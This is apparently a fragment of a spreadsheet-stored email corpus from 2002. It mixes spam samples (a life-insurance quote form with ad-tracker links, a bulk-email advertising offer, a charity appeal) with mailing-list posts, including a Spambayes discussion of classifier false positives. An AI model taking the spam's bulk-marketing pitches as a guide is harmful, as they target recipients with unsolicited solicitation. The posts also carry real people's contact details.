                                 Female&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;/tbody&gt;
                           &lt;/table&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td class=content width="35%"&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;&lt;strong&gt;Have
                           you used any tobacco products in the last 12 months?&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td noWrap width="65%" align="left" valign="middle"&gt;
                           &lt;table cellspacing=0 width="100%" border=0&gt;
                             &lt;tbody&gt;
                             &lt;tr&gt;
                               &lt;td width="50%"&gt; &lt;b&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;
                                 &lt;input id=FormsRadioButton4 type=radio
                         value=N name=Tobacco&gt;
                                 No&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                               &lt;td width="50%"&gt; &lt;b&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;
                                 &lt;input id=FormsRadioButton3 type=radio
                         value=Y name=Tobacco&gt;
                                 Yes&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                             &lt;/tr&gt;
                             &lt;/tbody&gt;
                           &lt;/table&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td class=content width="35%"&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;&lt;strong&gt;Coverage
                           Amount:&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td class=content width="65%" align="left" valign="middle"&gt;
                           &lt;font face="Tahoma, Verdana, Arial"&gt;
                           &lt;select id=FormsComboBox11
                   size=1 name=coverage-amount&gt;
                             &lt;option value=""
                     selected&gt;Select Amount&lt;/option&gt;
                             &lt;option
                     value=100000.00&gt;100,000&lt;/option&gt;
                             &lt;option
                     value=125000.00&gt;125,000&lt;/option&gt;
                             &lt;option
                     value=150000.00&gt;150,000&lt;/option&gt;
                             &lt;option
                     value=175000.00&gt;175,000&lt;/option&gt;
                             &lt;option
                     value=200000.00&gt;200,000&lt;/option&gt;
                             &lt;option
                     value=225000.00&gt;225,000&lt;/option&gt;
                             &lt;option
                     value=250000.00&gt;250,000&lt;/option&gt;
                             &lt;option
                     value=275000.00&gt;275,000&lt;/option&gt;
                             &lt;option
                     value=300000.00&gt;300,000&lt;/option&gt;
                             &lt;option
                     value=325000.00&gt;325,000&lt;/option&gt;
                             &lt;option
                     value=350000.00&gt;350,000&lt;/option&gt;
                             &lt;option
                     value=375000.00&gt;375,000&lt;/option&gt;
                             &lt;option
                     value=400000.00&gt;400,000&lt;/option&gt;
                             &lt;option
                     value=425000.00&gt;425,000&lt;/option&gt;
                             &lt;option
                     value=450000.00&gt;450,000&lt;/option&gt;
                             &lt;option
                     value=475000.00&gt;475,000&lt;/option&gt;
                             &lt;option
                     value=500000.00&gt;500,000&lt;/option&gt;
                             &lt;option
                     value=550000.00&gt;550,000&lt;/option&gt;
                             &lt;option
                     value=600000.00&gt;600,000&lt;/option&gt;
                             &lt;option
                     value=650000.00&gt;650,000&lt;/option&gt;
                             &lt;option
                     value=700000.00&gt;700,000&lt;/option&gt;
                             &lt;option
                     value=750000.00&gt;750,000&lt;/option&gt;
                             &lt;option
                     value=800000.00&gt;800,000&lt;/option&gt;
                             &lt;option
                     value=850000.00&gt;850,000&lt;/option&gt;
                             &lt;option
                     value=900000.00&gt;900,000&lt;/option&gt;
                             &lt;option
                     value=950000.00&gt;950,000&lt;/option&gt;
                             &lt;option
                     value=1000000.00&gt;1,000,000&lt;/option&gt;
                             &lt;option
                     value=1250000.00&gt;1,250,000&lt;/option&gt;
                             &lt;option
                     value=1500000.00&gt;1,500,000&lt;/option&gt;
                             &lt;option
                     value=1750000.00&gt;1,750,000&lt;/option&gt;
                             &lt;option
                     value=2000000.00&gt;2,000,000&lt;/option&gt;
                             &lt;option
                     value=2250000.00&gt;2,250,000&lt;/option&gt;
                             &lt;option
                     value=2500000.00&gt;2,500,000&lt;/option&gt;
                             &lt;option
                     value=3000000.00&gt;3,000,000&lt;/option&gt;
                             &lt;option
                     value=3500000.00&gt;3,500,000&lt;/option&gt;
                             &lt;option
                     value=4000000.00&gt;4,000,000&lt;/option&gt;
                             &lt;option
                     value=4500000.00&gt;4,500,000&lt;/option&gt;
                             &lt;option
                     value=5000000.00&gt;5,000,000&lt;/option&gt;
                             &lt;option
                     value=6000000.00&gt;6,000,000&lt;/option&gt;
                             &lt;option
                     value=7000000.00&gt;7,000,000&lt;/option&gt;
                             &lt;option
                     value=8000000.00&gt;8,000,000&lt;/option&gt;
                             &lt;option
                     value=9000000.00&gt;9,000,000&lt;/option&gt;
                             &lt;option
                     value=10000000.00&gt;10,000,000&lt;/option&gt;
                             &lt;option
                     value=11000000.00&gt;11,000,000&lt;/option&gt;
                             &lt;option
                     value=12000000.00&gt;12,000,000&lt;/option&gt;
                             &lt;option
                     value=13000000.00&gt;13,000,000&lt;/option&gt;
                             &lt;option
                     value=14000000.00&gt;14,000,000&lt;/option&gt;
                             &lt;option
                     value=15000000.00&gt;15,000,000&lt;/option&gt;
                           &lt;/select&gt;
                           &lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td class=content width="35%"&gt;&lt;font size="1" face="Tahoma, Verdana, Arial" color="#FFFFFF"&gt;&lt;strong&gt;How
                           long do you need the coverage?&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td class=content width="65%" align="left" valign="middle"&gt;
                           &lt;font face="Tahoma, Verdana, Arial"&gt;
                           &lt;select id=FormsComboBox10
                   size=1 name=plan&gt;
                             &lt;option value="" selected&gt;Select Year&lt;/option&gt;
                             &lt;option value=5&gt;5 Years&lt;/option&gt;
                             &lt;option
                     value=10&gt;10 Years&lt;/option&gt;
                             &lt;option value=15&gt;15 Years&lt;/option&gt;
                             &lt;option value=20&gt;20 Years&lt;/option&gt;
                             &lt;option
                     value=25&gt;25 Years&lt;/option&gt;
                             &lt;option value=30&gt;30 Years&lt;/option&gt;
                           &lt;/select&gt;
                           &lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;
                         &lt;td width="35%" height="2"&gt;&amp;nbsp; &lt;/td&gt;
                         &lt;td class=content align=left width="65%" height="2" valign="top"&gt;
                           &lt;font face="Tahoma, Verdana, Arial"&gt;
                           &lt;input id=FormsButton1 type=submit value="Get A Quote" name=SubmitButton&gt;
                           &lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;/tbody&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/tbody&gt;
               &lt;/table&gt;
             &lt;/form&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;td align="left" valign="top" width="44%" height="377"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=YUESBHWAKMLK&amp;ext=1" target="_blank"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/photo6.jpg" width="210" height="173" border="0"&gt;&lt;/a&gt;&lt;br&gt;
       &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr align="center" valign="top"&gt;
           &lt;td height="217" nowrap&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="10"&gt;
               &lt;tr align="left" valign="top"&gt;
                 &lt;td height="40"&gt;
                   &lt;div align="center"&gt;&lt;font face="Tahoma, Verdana, Arial" size="1" color="#FFFFFF"&gt;&lt;b&gt;ReliaQuote
                     makes it easy and affordable. We can instantly provide you
                     with free quotes from highly rated insurance companies. &lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr align="left" valign="top"&gt;
                 &lt;td height="106"&gt;
                   &lt;table width="100%" border="0" cellspacing="0" cellpadding="0"&gt;
                     &lt;tr align="center" valign="top"&gt;
                       &lt;td height="2"&gt;&lt;font face="Tahoma, Verdana, Arial" size="3" color="#FFFFFF"&gt;&lt;b&gt;Save
                         up to&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align="center" valign="top"&gt;
                       &lt;td height="36"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=YUESBHWAKMLK&amp;ext=1" target="_blank"&gt;&lt;img src="http://www.reliaquote.com/banner/bannerads/images/70percent6.gif" width="131" height="57" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align="center" valign="top"&gt;
                       &lt;td height="8"&gt;&lt;font face="Tahoma, Verdana, Arial" size="3" color="#FFFFFF"&gt;&lt;b&gt;on
                         Life Insurance&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align="center" valign="middle"&gt;
                 &lt;td height="67"&gt;&lt;font color="#FFCC33" size="3" face="Tahoma, Verdana, Arial"&gt;&lt;b&gt;&lt;font color="#FFCC99" size="2"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=YUESBHWAKMLK&amp;ext=1" target="_blank"&gt;
                   &lt;font color="#FFFFFF"&gt;Compare quotes today&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt;.&lt;/font&gt;&lt;/font&gt;&lt;font face="Tahoma, Verdana, Arial" size="2" color="#0000FF"&gt;
                   &lt;/font&gt;&lt;font face="Tahoma, Verdana, Arial" size="2" color="#FFCC00"&gt;&lt;br&gt;
                   There is nothing more &lt;br&gt;
                   important than protecting &lt;br&gt;
                   their future.&lt;br&gt;
                   &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;div align="center"&gt;&lt;font color="#FFFFFF" size="1"&gt;Copyright 2001 ReliaQuote,
         Inc.&lt;br&gt;
         All rights reserved.&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=YUESBHWAKMLK"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</si>
  <si>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Re: Entrepreneurs
</t>
  </si>
  <si>
    <t xml:space="preserve">There's been well documented articles, studies of the
 French tax laws, corporate governance, and financial
 oversight that 1) dont' easily allow for ISOs, the root
 of almost all entrepreneurialship, and 2) the easy flow
 of capital to new ventures.  It was an extremely large
 issue, even debated widely in France.
 Greg
 Chuck Murcko wrote:
 &gt; According to my son, it was actually Homer Simpson, who claimed the 
 &gt; French had no word for victory.
 &gt; 
 &gt; Chuck
 &gt; 
 &gt; On Thursday, August 22, 2002, at 01:58 PM, Robert Harley wrote:
 &gt; 
 &gt;&gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):
 &gt;&gt;
 &gt;&gt; http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html
 &gt;&gt;
 &gt;&gt; ------------------------------------------------------------------------------ 
 &gt;&gt;
 &gt;&gt; TONY BLAIR's special relationship with George W. Bush is under
 &gt;&gt; considerable strain. Not only do the two disagree on Yassir Arafat's
 &gt;&gt; tenure as leader of the Palestinian Authority, but Blair has started
 &gt;&gt; telling disparaging anecdotes about the President.
 &gt;&gt;
 &gt;&gt; Baroness Williams of Crosby recalled a story told to her by 'my good
 &gt;&gt; friend Tony Blair' recently in Brighton. Blair, Bush and Jacques
 &gt;&gt; Chirac were discussing economics and, in particular, the decline of
 &gt;&gt; the French economy. 'The problem with the French,' Bush confided in
 &gt;&gt; Blair, 'is that they don't have a word for entrepreneur.'
 &gt;&gt; ------------------------------------------------------------------------------ 
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; R
 &gt;&gt; http://xent.com/mailman/listinfo/fork
 &gt;&gt;
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IIU] Viruses and Bounced Mail
</t>
  </si>
  <si>
    <t xml:space="preserve">All,
 Is it just me or has there been a massive increase in the amount of email 
 being falsely bounced around the place? I've already received email from a 
 number of people I don't know, asking why I am sending them email. These 
 can be explained by servers from Russia and elsewhere. Coupled with the 
 false emails I received myself, it's really starting to annoy me. Am I the 
 only one seeing an increase in recent weeks?
 Martin
 ========================================================================
 Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 " Our core product Diseditor  allows organisations to publish information 
 to their web site in a fast and cost effective manner. There is no need for 
 a full time web developer, as the site can be easily updated by the 
 organisations own staff.
 Instant updates to keep site information fresh. Sites which are updated 
 regularly bring users back. Visit www.deisedesign.com/deiseditor.html for a 
 demonstration "
 Diseditor  " Managing Your Information "
 ========================================================================
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The GOv gets tough on Net Users.....er Pirates..
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 23 Aug 2002, Tom wrote:
 &gt; from http://www.arstechnica.com/
 &gt;
 &gt; "There has mostly been talk thus far and little action, but the
 &gt; Department of Justice says it may be ready to file criminal lawsuits
 &gt; against individuals [1] who distribute or receive unauthorized
 &gt; copyrighted material over the Internet.
 And yet STILL noone is out there creating _public domain_ content. Is there
 even one person out there can can even begin to talk without being a
 complete hypocrite? And no the "open source" people cant talk either, the
 GPL aint even close. I know I cant talk.
 If the creator didnt say you could have it without paying, it's theft, so
 simple, hell that's even in all the major holy books.
 Fair use needs to be clarified a bit and then I hope they start locking
 people up. How else do i ever have hope of finding a job working for someone
 that makes things people are supposed to ... *drumroll* pay for.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MULTIPLY YOUR CUSTOMER BASE!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ricardo1 ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;b&gt;&lt;font color = "red" size = "+2.5"&gt;COST EFFECTIVE Direct Email Advertising&lt;/font&gt;&lt;br&gt;
 &lt;font color = "blue" size = "+2"&gt;Promote Your Business For As Low As &lt;/font&gt;&lt;br&gt;
 &lt;font color = "red" size = "+2"&gt;$50&lt;/font&gt; &lt;font color = "blue" size = "+2"&gt;Per 
 &lt;font color = "red" size = "+2"&gt;1 Million&lt;/font&gt;
 &lt;font color = "blue" size = "+2"&gt; Email Addresses&lt;/font&gt;&lt;/font&gt;&lt;p&gt;
 &lt;b&gt;&lt;font color = "#44C300" size ="+2"&gt;MAXIMIZE YOUR MARKETING DOLLARS!&lt;p&gt;&lt;/FONT&gt;&lt;/b&gt;
 &lt;font size = "+2"&gt;Complete and fax this information form to 309-407-7378.&lt;Br&gt;
 A Consultant will contact you to discuss your marketing needs.&lt;br&gt;
 &lt;/font&gt;&lt;/font&gt;
 &lt;Table&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;NAME:___________________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;COMPANY:_______________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;ADDRESS:________________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;CITY:_____________________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;STATE:___________________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;PHONE:___________________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;E-MAIL:__________________________________________________________________&lt;br&gt;
 &lt;font size = "+1"&gt;&lt;b&gt;WEBSITE: &lt;font size = "-1" color = "red"&gt;(Not Required)&lt;/font&gt;_______________________________________________________&lt;br&gt;
 ___________________________________________________________________________&lt;br&gt;
 ___________________________________________________________________________&lt;br&gt;
 &lt;b&gt;&lt;font color = "red"&gt;*&lt;/font&gt;COMMENTS: &lt;font color = "Red" size = "-1"&gt;(Provide details, pricing, etc. on the products and services you wish to market)&lt;/font&gt;&lt;br&gt;
 ___________________________________________________________________________&lt;br&gt;
 ___________________________________________________________________________&lt;br&gt;
 ___________________________________________________________________________&lt;br&gt;
 ___________________________________________________________________________&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] inputting chinese characters in Redhat 7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Wed, 31 Jul 2002 23:11:49 +0800
   | From: Fergal Daly &lt;fergal@esatclear.ie&gt;
   | 
   | 7.3 seems to support Chinese input out of the box, it's got
   | miniChinput and some other stuff no documentation.  [ ... ]
   | google is a bit of a dead too.
   | 
   | Can anyone tell me what I should do?
  I've no idea, but a relevant/useful source of info could
  be the «linux-utf8» e-list:
      http://www.cl.cam.ac.uk/~mgk25/unicode.html
      http://mail.nl.linux.org/linux-utf8/
  whilst the list is nominally about UTF-8/Unicode and Linux,
  it often delves into related areas (such as input methods).
  my (vague!) understanding of the state-of-play is there are
  multiple ways of keyboarding scripts such as "Chinese", and
  the choice of method is a mixture of personal preference,
  equipment (e.g. your keyboard), and the tool/application
  in question.
  w.r.t. X11 applications, it seems to boil down to two
  approaches:   one unique to the tool itself (apparently
  `yudit' is famous for this);  or  else using what's called
  an XIM (X Input Method).
   WARNING: I am now guessing quite a bit here, based mostly on
            my interpretation of what I've read whilst lurking,
            and watching a few people keyboarding a Japanese
            script years ago!   *** your mileage will vary! ***
  XIMs generally work as a complex compose frontend.  i.e., you
  build up your character as a series of composes of the root or
  fundamental strokes ("radicals", I think they are called), and
  then "commit" the composite character to the application.
  ( yes, keyboarding these scripts _is_ quite slow, I believe
   a good typist can only do a few characters a minute!
   and I assume using a qwerty keyboard is very painful. )
  some XIMs compose "in place", others do it on a special line,
  and some seem to do it in a special window (or the root?).
  also, some(/most?) XIMs apparently support a US-ASCII input
  mode as well --- _not_ a general Latin-alphabet input mode,
  which seems to require another TLA, called KBD, and which
  apparently doesn't work when an XIM is also being used? ---
  implying you have to switch back and forth between US-ASCII
  input mode (what us English-speakers would call "normal"
  keyboarding/typing), and the other input (e.g., Chinese).
  I'm not sure, but I have the impression the switch is often
  a toggle, and something like &lt;Control&gt;&lt;CapsLock&gt;.
  many apologies if this is completely wrong or too misleading.
 cheers!
 	-blf-
 p.s.  b.t.w., you almost certainly want to be using a UTF-8
       locale.  if RH 7.3 is the so-called "limbo" release,
       then you may quite possibility be using one by default.
 --
 «How many surrealists does it take to    |  Brian Foster    Dublin, Ireland
  change a lightbulb?  Three.  One calms  |  e-mail: blf@utvinternet.ie
  the warthog, and two fill the bathtub   |  mobile: (+353 or 0)86 854 9268
  with brightly-coloured machine tools.»  |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</si>
  <si>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Subject: hello everybody
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi everybody !
 My name is Gilles, I'm 19 and I'm french. My english is very bad and I'm sorry 
 if you do not understand correctly my emails. 
 I use Linux since 3 months. Before I worked with Windows 2000 Pro. I enjoy Red 
 Hat... I tried Mandrake, SuSE, Debian, Slackware and my favorite of all of 
 them is Red Hat. 
 Actually I use Red Hat 7.3.
 I visited the web site Freshrpms, I congratulated Thias for his work.
 And I subscribed to this list for to know more about Red Hat and RPMs' news.
 Pleased to read U soon.
 Gilles (Nice, South of France)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: National Charity Suffering Since 9/11
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Dear Friend,&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;"Serving the Tribes While Sharing the Culture"... Has been the mission for the American Indian Heritage Foundation for the past 29 years.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;For many years, AIHF has met the emergency requests from hundreds of Tribes with food, clothing, medical supplies, emergency grants and more. Our Student Eagle Awards program inspires Indian Youth to aspire and our Scholarship program for Young Indian Women has meant more than just financial aid to hundrends of beautiful Indian Women.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;This worthwhile endeavor is entirely funded by very generous people like you who want to help and make a difference. We need your help NOW more than ever.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&lt;a href="http://www.indians.org/gift/gift.html"&gt; Click Here To learn more... maybe YOU can help.&lt;/a&gt;  &lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;"May You Always Walk In Beauty"&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;Pale Moon&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;We appologize if this message has been an inconvenience. You may comment to our &lt;a href="mailto:Webmaster@indians.org"&gt;webmaster.&lt;/a&gt;  &lt;/FONT&gt;&lt;/DIV&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] test sets?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; But it also identified as spam everything in my inbox that had any
 &gt; &gt; MIME structure or HTML parts, and several messages in my saved 'zope
 &gt; &gt; geeks' list that happened to be using MIME and/or HTML.
 &gt; 
 &gt; Do you know why?  The strangest implied claim there is that it hates MIME
 &gt; independent of HTML.  For example, the spamprob of 'content-type:text/plain'
 &gt; in that pickle is under 0.21.  'content-type:multipart/alternative' gets
 &gt; 0.93, but that's not a killer clue, and one bit of good content will more
 &gt; than cancel it out.
 I reran the experiment (with the new SpamHam1.pik, but it doesn't seem
 to make a difference).  Here are the clues for the two spams in my
 inbox (in hammie.py's output format, which sorts the clues by
 probability; the first two numbers are the message number and overall
 probability; then line-folded):
     66 1.00 S 'facility': 0.01; 'speaker': 0.01; 'stretch': 0.01;
     'thursday': 0.01; 'young,': 0.01; 'mistakes': 0.12; 'growth':
     0.85; '&gt;content-type:text/plain': 0.85; 'please': 0.85; 'capital':
     0.92; 'series': 0.92; 'subject:Don': 0.94; 'companies': 0.96;
     '&gt;content-type:text/html': 0.96; 'fee': 0.96; 'money': 0.96;
     '8:00am': 0.99; '9:00am': 0.99; '&gt;content-type:image/gif': 0.99;
     '&gt;content-type:multipart/alternative': 0.99; 'attend': 0.99;
     'companies,': 0.99; 'content-type/type:multipart/alternative':
     0.99; 'content-type:multipart/related': 0.99; 'economy': 0.99;
     'economy"': 0.99
 This has 6 content-types as spam clues, only one of which is related
 to HTML, despite there being an HTML alternative (and 12 other spam
 clues, vs. only 6 ham clues).  This was an announcement of a public
 event by our building owners, with a text part that was the same as
 the HTML (AFAICT).  Its language may be spammish, but the content-type
 clues didn't help.  (BTW, it makes me wonder about the wisdom of
 keeping punctuation -- 'economy' and 'economy"' to me don't seem to
 deserve two be counted as clues.)
     76 1.00 S '(near': 0.01; 'alexandria': 0.01; 'conn': 0.01;
     'from:adam': 0.01; 'from:email addr:panix': 0.01; 'poked': 0.01;
     'thorugh': 0.01; 'though': 0.03; "i'm": 0.03; 'reflect': 0.05;
     "i've": 0.06; 'wednesday': 0.07; 'content-disposition:inline':
     0.10; 'contacting': 0.93; 'sold': 0.96; 'financially': 0.98;
     'prices': 0.98; 'rates': 0.99; 'discount.': 0.99; 'hotel': 0.99;
     'hotels': 0.99; 'hotels.': 0.99; 'nights,': 0.99; 'plaza': 0.99;
     'rates,': 0.99; 'rates.': 0.99; 'rooms': 0.99; 'season': 0.99;
     'stations': 0.99; 'subject:Hotel': 0.99
 Here is the full message (Received: headers stripped), with apologies
 to Ziggy and David:
 """
 Date: Fri, 06 Sep 2002 17:17:13 -0400
 From: Adam Turoff &lt;ziggy@panix.com&gt;
 Subject: Hotel information
 To: guido@python.org, davida@activestate.com
 Message-id: &lt;20020906211713.GK7451@panix.com&gt;
 MIME-version: 1.0
 Content-type: text/plain; charset=us-ascii
 Content-disposition: inline
 User-Agent: Mutt/1.4i
 I've been looking into hotels.  I poked around expedia for availability
 from March 26 to 29 (4 nights, wednesday thorugh saturday).  
 I've also started contacting hotels for group rates; some of the group
 rates are no better than the regular rates, and they require signing a
 contract with a minimum number of rooms sold (with someone financially
 responsible for unbooked rooms).  Most hotels are less than responsive...
 	Radission - Barcelo Hotel (DuPont Circle)
 	$125/night, $99/weekend
 	State Plaza hotel (Foggy Bottom; near GWU)
 	$119/night, $99/weekend
 	Hilton Silver Spring (Near Metro, in suburban MD)
 	$99/hight, $74/weekend
 	Windsor Park Hotel
 	Conn Ave, between DuPont Circle/Woodley Park Metro stations
 	$95/night; needs a car
 	Econo Lodge Alexandria (Near Metro, in suburban VA)
 	$95/night
 This is a hand picked list; I ignored anything over $125/night, even
 though there are some really well situated hotels nearby at higher rates.
 Also, I'm not sure how much these prices reflect an expedia-only
 discount.  I can't vouch for any of these hotels, either.
 I also found out that the down season for DC Hotels are mid-june through
 mid-september, and mid-november through mid-january.
 Z.
 """
 This one has no MIME structure nor HTML!  It even has a
 Content-disposition which is counted as a non-spam clue.  It got
 f-p'ed because of the many hospitality-related and money-related
 terms.  I'm surprised $125/night and similar aren't clues too.  (And
 again, several spam clues are duplicated with different variations:
 'hotel', 'hotels', 'hotels.', 'subject:Hotel', 'rates,', 'rates.'.
 &gt; WRT hating HTML, possibilities include:
 &gt; 
 &gt; 1. It really had to do with something other than MIME/HTML.
 &gt; 
 &gt; 2. These are pure HTML (not multipart/alternative with a text/plain part),
 &gt;    so that the tags aren't getting stripped.  The pickled classifier
 &gt;    despises all hints of HTML due to its c.l.py heritage.
 &gt; 
 &gt; 3. These are multipart/alternative with a text/plain part, but the
 &gt;    latter doesn't contain the same text as the text/html part (for
 &gt;    example, as Anthony reported, perhaps the text/plain part just
 &gt;    says something like "This is an HMTL message.").
 &gt; 
 &gt; If it's #2, it would be easy to add an optional bool argument to tokenize()
 &gt; meaning "even if it is pure HTML, strip the tags anyway".  In fact, I'd like
 &gt; to do that and default it to True.  The extreme hatred of HTML on tech lists
 &gt; strikes me as, umm, extreme &lt;wink&gt;.
 I also looked in more detail at some f-p's in my geeks traffic.  The
 first one's a doozie (that's the term, right? :-).  It has lots of
 HTML clues that are apparently ignored.  It was a multipart/mixed with
 two parts: a brief text/plain part containing one or two sentences, a
 mondo weird URL:
 http://x60.deja.com/[ST_rn=ps]/getdoc.xp?AN=687715863&amp;CONTEXT=973121507.1408827441&amp;hitnum=23
 and some employer-generated spammish boilerplate; the second part was
 the HTML taken directly from the above URL.  Clues:
     43 1.00 S '"main"': 0.01; '(later': 0.01; '(lots': 0.01; '--paul':
     0.01; '1995-2000': 0.01; 'adopt': 0.01; 'apps': 0.01; 'commands':
     0.01; 'deja.com': 0.01; 'dejanews,': 0.01; 'discipline': 0.01;
     'duct': 0.01; 'email addr:digicool': 0.01; 'email name:paul':
     0.01; 'everitt': 0.01; 'exist,': 0.01; 'forwards': 0.01;
     'framework': 0.01; 'from:email addr:digicool': 0.01; 'from:email
     name:&lt;paul': 0.01; 'from:paul': 0.01; 'height': 0.01;
     'hodge-podge': 0.01; 'http0:deja': 0.01; 'http0:zope': 0.01;
     'http1:[st_rn': 0.01; 'http1:comp': 0.01; 'http1:getdoc': 0.01;
     'http1:ps]': 0.01; 'http&gt;1:22': 0.01; 'http&gt;1:24': 0.01;
     'http&gt;1:57': 0.01; 'http&gt;1:an': 0.01; 'http&gt;1:author': 0.01;
     'http&gt;1:fmt': 0.01; 'http&gt;1:getdoc': 0.01; 'http&gt;1:pr': 0.01;
     'http&gt;1:products': 0.01; 'http&gt;1:query': 0.01; 'http&gt;1:search':
     0.01; 'http&gt;1:viewthread': 0.01; 'http&gt;1:xp': 0.01; 'http&gt;1:zope':
